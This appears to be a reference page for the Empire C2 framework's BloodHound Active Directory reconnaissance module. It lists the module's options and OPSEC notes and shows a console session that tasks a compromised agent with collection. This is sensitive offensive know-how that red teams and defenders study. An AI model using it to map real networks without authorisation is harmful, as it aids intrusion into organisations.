Invoke-BloodHound - Empire Module
This page contains detailed information about how to use the powershell/situational_awareness/network/bloodhound Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-BloodHound
Module: powershell/situational_awareness/network/bloodhound
Source code [1]: empire/server/modules/powershell/situational_awareness/network/bloodhound.yaml
Source code [2]: empire/server/data/module_source/situational_awareness/network/BloodHound.ps1
MITRE ATT&CK:
T1484
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes
The bloodhound module executes BloodHound data collection.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the bloodhound module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the bloodhound module:
Agent
Agent to run module on.
CollectionMethod
The method to collect data. 'Group', 'ComputerOnly', 'LocalGroup', 'GPOLocalGroup', 'Session', 'LoggedOn', 'Trusts, 'Stealth', or 'Default'.
Default value: Default.
Threads
The maximum concurrent threads to execute.
Default value: 20.
Throttle
The number of cypher queries to queue up for neo4j RESTful API ingestion.
Default value: 1000.
Additional Module Options
This is a list of additional options that are supported by the bloodhound module:
CSVFolder
The CSV folder to use for output, defaults to the current folder location.
Default value: $(Get-Location).
CSVPrefix
A prefix for all CSV files.
ComputerADSpath
The LDAP source to search through for computers, e.g. "LDAP://OU=secret,DC=testlab,DC=local.
ComputerName
Array of one or more computers to enumerate.
Domain
The domain to use for the query, defaults to the current domain.
DomainController
Domain controller to reflect LDAP queries through.
GlobalCatalog
The global catalog location to resolve user memberships from.
SearchForest
Switch. Search all domains in the forest.
SkipGCDeconfliction
Switch. Skip global catalog enumeration for session deconfliction.
URI
The BloodHound neo4j URL location (http://host:port/).
UserADSPath
The LDAP source to search through for users/groups, e.g. "LDAP://OU=secret,DC=testlab,DC=local.
UserPass
The "user:password" for the BloodHound neo4j instance.
Bloodhound Example Usage
Here's an example of how to use the bloodhound module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/situational_awareness/network/bloodhound
Author @harmj0y
@_wald0
@cptjesus
Background True
Comments https://bit.ly/getbloodhound
Description Execute BloodHound data collection.
Language powershell
Name powershell/situational_awareness/network/bloodhound
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1484
,Record Options-------,-----------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|---------------------|-----------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|---------------------|-----------------|----------|-------------------------------------|
| CSVFolder | $(Get-Location) | False | The CSV folder to use for output, |
| | | | defaults to the current folder |
| | | | location. |
|---------------------|-----------------|----------|-------------------------------------|
| CSVPrefix | | False | A prefix for all CSV files. |
|---------------------|-----------------|----------|-------------------------------------|
| CollectionMethod | Default | True | The method to collect data. |
| | | | 'Group', 'ComputerOnly', |
| | | | 'LocalGroup', 'GPOLocalGroup', |
| | | | 'Session', 'LoggedOn', 'Trusts, |
| | | | 'Stealth', or 'Default'. |
|---------------------|-----------------|----------|-------------------------------------|
| ComputerADSpath | | False | The LDAP source to search through |
| | | | for computers, e.g. "LDAP://OU=secr |
| | | | et,DC=testlab,DC=local" |
|---------------------|-----------------|----------|-------------------------------------|
| ComputerName | | False | Array of one or more computers to |
| | | | enumerate |
|---------------------|-----------------|----------|-------------------------------------|
| Domain | | False | The domain to use for the query, |
| | | | defaults to the current domain. |
|---------------------|-----------------|----------|-------------------------------------|
| DomainController | | False | Domain controller to reflect LDAP |
| | | | queries through. |
|---------------------|-----------------|----------|-------------------------------------|
| GlobalCatalog | | False | The global catalog location to |
| | | | resolve user memberships from. |
|---------------------|-----------------|----------|-------------------------------------|
| SearchForest | | False | Switch. Search all domains in the |
| | | | forest. |
|---------------------|-----------------|----------|-------------------------------------|
| SkipGCDeconfliction | | False | Switch. Skip global catalog |
| | | | enumeration for session |
| | | | deconfliction |
|---------------------|-----------------|----------|-------------------------------------|
| Threads | 20 | True | The maximum concurrent threads to |
| | | | execute. |
|---------------------|-----------------|----------|-------------------------------------|
| Throttle | 1000 | True | The number of cypher queries to |
| | | | queue up for neo4j RESTful API |
| | | | ingestion. |
|---------------------|-----------------|----------|-------------------------------------|
| URI | | False | The BloodHound neo4j URL location |
| | | | (http://host:port/) |
|---------------------|-----------------|----------|-------------------------------------|
| UserADSPath | | False | The LDAP source to search through |
| | | | for users/groups, e.g. "LDAP://OU=s |
| | | | ecret,DC=testlab,DC=local" |
|---------------------|-----------------|----------|-------------------------------------|
| UserPass | | False | The "user:password" for the |
| | | | BloodHound neo4j instance |
'---------------------'-----------------'----------'-------------------------------------'
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set CollectionMethod Default
[*] Set CollectionMethod to Default
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set Threads 20
[*] Set Threads to 20
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > set Throttle 1000
[*] Set Throttle to 1000
(Empire: usemodule/powershell/situational_awareness/network/bloodhound) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/situational_awareness/network/bloodhound.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/situational_awareness/network/BloodHound.ps1
- https://bit.ly/getbloodhound
- http://attack.mitre.org/techniques/T1484
- https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1
- http://poshcode.org/2189
- https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
- https://support.microsoft.com/en-us/kb/243330
- http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
- http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
- https://github.com/darkoperator/Posh-SecMod/blob/master/Audit/Audit.psm1
- https://msdn.microsoft.com/en-us/library/cc227147.aspx
- https://msdn.microsoft.com/en-us/library/cc230324.aspx
- https://morgansimonsenblog.azurewebsites.net/tag/groups/
- http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
- http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
- http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
- http://blog.harmj0y.net/
- http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/
- https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407
- http://SERVER:7474/
- http://neo4j.com/docs/stable/rest-api-batch-ops.html
- http://stackoverflow.com/questions/19839469/optimizing-high-volume-batch-inserts-into-neo4j-using-rest
- https://msdn.microsoft.com/en-us/library/system.directoryservices.activedirectoryrights(v=vs.110).aspx
- http://stackoverflow.com/questions/28077854/powershell-2-0-convertfrom-json-and-convertto-json-implementation
See Also
Check also the following modules related to this module:
- powershell/situational_awareness/network/bloodhound3
- powershell/situational_awareness/network/arpscan
- powershell/situational_awareness/network/reverse_dns
- powershell/situational_awareness/network/get_sql_server_info
- powershell/situational_awareness/network/smbscanner
- powershell/situational_awareness/network/get_kerberos_service_ticket
- powershell/situational_awareness/network/portscan
- powershell/situational_awareness/network/get_sql_instance_domain
- powershell/situational_awareness/network/smblogin
- powershell/situational_awareness/network/smbautobrute
- powershell/situational_awareness/network/get_spn
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.
